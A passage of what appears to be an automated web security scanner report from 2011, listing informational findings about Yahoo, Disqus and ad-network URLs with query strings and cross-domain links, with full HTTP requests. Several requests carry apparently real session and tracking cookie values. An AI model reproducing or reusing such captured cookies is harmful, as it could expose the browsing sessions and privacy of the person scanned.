<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.doubleclick.net/adj/gm.kotaku/pc;ptile=10;sz=640x360;ord=56598520;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.yimg.com
Path:	/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js

Issue detail

The page was loaded from a URL containing a query string:

http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m

The response contains the following links to other domains:

http://fantasysports.yahoo.com/
http://fantasysports.yahoo.com/edit/usergames

Request

GET /j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 10:12:34 GMT
Cache-Control: public, max-age=315360000
Expires: Thu, 10 Jun 2021 10:12:34 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 2903
Content-Length: 248508
Proxy-Connection: keep-alive
Server: YTS/1.19.5

if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=(""+A[C]).split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.leng
...[SNIP]...
</span><a href="http://fantasysports.yahoo.com/edit/usergames" class="edit" title="Edit my Teams and Leagues">Edit</a>
...[SNIP]...
<h6><a href="http://fantasysports.yahoo.com/">See All of My Teams »</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.yimg.com
Path:	/j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js

Issue detail

The page was loaded from a URL containing a query string:

http://l.yimg.com/j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js?z&m

The response contains the following links to other domains:

http://fantasysports.yahoo.com/
http://fantasysports.yahoo.com/edit/usergames

Request

GET /j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/expertsarchive?author=Adrian+Wojnarowski
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 09 Jun 2011 19:15:31 GMT
Cache-Control: public, max-age=315360000
Expires: Sun, 06 Jun 2021 19:15:31 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 317124
Content-Length: 229119
Proxy-Connection: keep-alive
Server: YTS/1.19.5

if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=(""+A[C]).split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.leng
...[SNIP]...
</span><a href="http://fantasysports.yahoo.com/edit/usergames" class="edit" title="Edit my Teams and Leagues">Edit</a>
...[SNIP]...
<h6><a href="http://fantasysports.yahoo.com/">See All of My Teams »</a>
...[SNIP]...

18.179. http://l.yimg.com/zz/combo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.yimg.com
Path:	/zz/combo

Issue detail

The page was loaded from a URL containing a query string:

http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/178/search-min.js

The response contains the following link to another domain:

http://us.lrd.yahoo.com/_ylc=X3oDMTFnNzFiMTJoBHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExMzA1NTYEdG1fbmV0A1lhaG9vIQ--/SIG=112cgufir/**http:/www.yahoo.com/?mkt=3

Request

GET /zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/178/search-min.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Thu, 09 Jun 2011 17:00:15 GMT
Content-Type: application/x-javascript
Expires: Sun, 30 Aug 2020 16:22:48 GMT
Date: Thu, 09 Jun 2011 17:00:15 GMT
Age: 324055
Content-Length: 20002
Server: YTS/1.19.5
Proxy-Connection: keep-alive

if(!window.ucs){window.ucs={};}YUI.add("ucs-skip-to-search",function(A){A.namespace("ucs");A.ucs.SkipToSearch=function(B){this.skipLink=B;this.init();};A.ucs.SkipToSearch.prototype={init:function(){th
...[SNIP]...
);},_hidePanel:function(C){C.halt();var B=this.container.one("div.yucs-sethp-panel"),D=this.container.one("div.pnt");D.addClass("hide");B.addClass("hide");},_loadBeacon:function(){var B=A.Node.create('<img width="0" height="0" src="http://us.lrd.yahoo.com/_ylc=X3oDMTFnNzFiMTJoBHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExMzA1NTYEdG1fbmV0A1lhaG9vIQ--/SIG=112cgufir/**http%3A/www.yahoo.com/%3Fmkt=3"/>');this.container.insert(B);},_setHpIe:function(C){C.halt();this.anchor.setStyle("behavior","url(#default#homepage)");this.anchor._node.setHomePage(this.container.one("a.yucs-sethp-panel-logo").getAttr
...[SNIP]...

18.180. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Issue detail

The page was loaded from a URL containing a query string:

http://load.exelator.com/load/?p=104&g=050&ssv_duid=910903057632460979

The response contains the following link to another domain:

http://d.xp1.ru4.com/meta?_o=65121&_t=xl&&ssv_duid=910903057632460979

Request

Response

18.181. https://login.yahoo.com/config/login_verify2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/config/login_verify2

Issue detail

The page was loaded from a URL containing a query string:

https://login.yahoo.com/config/login_verify2?.intl=us&.src=ym

The response contains the following links to other domains:

https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128k71jid(gid$YMgAQUWTcKCaXyrxTfXxcAGJrcHW80318nYACPM4,st$1307964022598926,v$1.0))&t=J-D
https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif
https://s.yimg.com/lq/i/reg/css/yregbase_sec_ui_1_9.css
https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js
https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 45773

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Yahoo! M
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="https://s.yimg.com/lq/i/reg/css/yregbase_sec_ui_1_9.css">
<style type="text/css">
...[SNIP]...

<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css"><style type="text/css">
...[SNIP]...
02527:HEAD/Y=YAHOO/EXP=1307971222/L=YMgAQUWTcKCaXyrxTfXxcAGJrcHW80318nYACPM4/B=0..fHkwNPRU-/J=1307964022673216/K=p6AVLqWyqNXXd6.KJCba3w/A=5775037/R=0/SIG=10mgpruen/*http://www.yahoo.com" target="_top"><img id="ygmalogoimg" width="142" height="26" src="https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif" alt="Yahoo!"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128k71jid(gid$YMgAQUWTcKCaXyrxTfXxcAGJrcHW80318nYACPM4,st$1307964022598926,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.182. http://mediacdn.disqus.com/1307735099/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1307735099/build/system/disqus.js

Issue detail

The page was loaded from a URL containing a query string:

http://mediacdn.disqus.com/1307735099/build/system/disqus.js?

The response contains the following links to other domains:

http://twitter.com/'+c+'
http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&

Request

GET /1307735099/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1307123702.5.5.utmcsr=pcmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article2/0,2817,2386340,00.asp; __utma=113869458.981292312.1305368048.1306977215.1307123702.5

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 10 Jun 2011 21:39:45 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 170035
X-Varnish: 9584260 9581370
Cache-Control: max-age=2370202
Expires: Sun, 10 Jul 2011 21:42:07 GMT
Date: Mon, 13 Jun 2011 11:18:45 GMT
Connection: close

DISQUS.dtpl=function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>",getGuestFields:function(a){function b(c){return DISQUS.nodes.get("#"+c+(a?"-"+a:""))}return{name:b("dsq-field-nam
...[SNIP]...
<span class="dsq-mention dsq-tt dsq-mention-twitter"original-title="Expand @'+c+'\'s profile" data-dsq-username="'+c+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+c+'" onclick="window.open(\''+("http://twitter.com/intent/user?screen_name="+c)+"', 'Twitter Mention', 'height=420, width=550');return false;\">@"+c+"</a>
...[SNIP]...
</param> <embed src="http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...

18.183. http://my.yahoo.com/darla/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:

http://my.yahoo.com/darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ1&en=utf-8&npv=1&rn=1307970669568

The response contains the following link to another domain:

http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128n0l8h3(gid$J5ESRGKL8NLm3NorTdAdCwq4rcHW8032DG4ABOOa,st$1307970670324079,v$1.0))&t=J-D

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ1&en=utf-8&npv=1&rn=1307970669568 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=Wtj.dCltxKKWR4yTxWi_CK3zDanzRVsKt8DTB2lpWI7zMVkiUsHadtRStTpEf2RsPhasVOexjjcF3fz81XvE4v.yNYuR.GBV3cPfQnU6y43PvH.k2AvYVaLo6yGHHOPZ_i5zjaWFBSQYbKhiX1uhCJ0xeDhAMtG6oI7N.XbXIymy8mseSmCJsUYNs2mNZA8Goqd6V7dmAQCh8Q_XdMSK2MPjzSi5v9CxVU0xOGdctWAsRnIMBPMlRFIRUh9Lx6w.lVHACtjxiB2yGToCqNbOBzwZ03riMmj3SE3sTBH84TjPrB7FHlSAUgMKgYL3clY8oEm7paKqf6Zj67HH4_M5gyBuN4FWEl2mUxPFQBnmQNw5AxvsPEfL0cdWt2fQHScYCxq35XuSkrdvkguLFYc_qGcqYGms1Fe2astRxElVMYNZUZ83IqqIaOHg4M6eIPdJRMj7Pusdir7jwPYovRuNefvFE6udsriCVQv6Qt7WxzmNKyQU3N9Xdj.ynSmNVze_TvL9eSmDdo79VDZMMlESsS66SZxkqUW5dbw4eZsSTqx5Yx1Y07hoMy3jQGCQAwW3VTD7DOZJ_Xt1Wy9ajjwKT4YQsAs0K.fqYiAHouD2nm0oIN4CV2Xo5rjMEOoJPDgYRklno2hDpWfjVrYrxHfskmnAW5QVe1Dew4djLXyT.3lpSFKNHORIrn8xgUsFRQHGe3e3crKUO7_.lpAt_vki&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAcKykQAEtfEABX5RAcfbgQDjXfEBxMJRAALUcQHG8IEA57Pw%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:11:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 7113

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128n0l8h3(gid$J5ESRGKL8NLm3NorTdAdCwq4rcHW8032DG4ABOOa,st$1307970670324079,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.184. http://my.yahoo.com/darla/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:

http://my.yahoo.com/darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ&en=utf-8&npv=1&rn=1307967071388

The response contains the following link to another domain:

http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128vcj26q(gid$YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc,st$1307967072076101,v$1.0))&t=J-D

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ&en=utf-8&npv=1&rn=1307967071388 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=zCnnyYVdNqFIU.3Dqhk5R0YGJjDyv3LLhul2gbHv70AbPyQ2FtLMR15PTO5Jvdl_CRFZiiBITmBcT0b5INiIgmNjscSro0nb2kCOPBtM5E_4.WgaaluKMhfhICINg0jnsTYiokS.M5Ug9pOxO2iVl_gMzRsxp4NW4jyairO7RcvP3JglBnvVXGmT0vX7cagLbtNq5jCnbzx8jsO3IEWzD.hyMKWCq4AqdPSLUfsfgXBaXZVAcsF3jmcRMCF25dMJCjp65xCIvB3vajB2eaRHdrFtMqbyASaZcblmtfwuXGG4oDoP6lW8ZHZQa0AbUhx6sanHlRaJwcrid3Gd8blBRegDQm3VundE8.99o3LaRbNmfyjjiKPwvqXibkvON7VoYc.fZIL855jQTtNv4YZmFUhaUVbr.MAr6W_ycV11KdmWJjVqixNdohcB2hEFAHYIxSj1ARj1wxcURmIUA4Z2CoX8FZiWiDF0ZBUoIwfaCv6PaOpK0bnBe5.n1qjdl1bRE_8LpLy6w9HHLVGP17pXJUbMAKucKbgX_FIMQhnKeqK7pcy0HW_yafioYPDSrtHii_a3EFAWvEaaM.94bkAH.hULOVSqwCgTBi2il.n1gDZO6HbHQ9qs6WwlJMV6ZrFxl9lJQXT8XqCIS1utCcv.S3M8YQRqJs0S6ywtMiPEddt3hGcnl4QmNLPQylP3kuW0CDQyYdCLbUbiCCsFeJt_&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAOYXYQAEtfEABX5RAONd8QAC1HEA57Pw%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:11:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 6436

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128vcj26q(gid$YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc,st$1307967072076101,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.185. http://my.yahoo.com/darla/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:

http://my.yahoo.com/darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=LREC&en=utf-8&npv=1&rn=1307970670570

The response contains the following link to another domain:

http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(12802onm2(gid$j6zt2GKL8NLm3NorTdAdCwgWrcHW8032DG4ADq8w,st$1307970670962477,v$1.0))&t=J-D

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=LREC&en=utf-8&npv=1&rn=1307970670570 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; 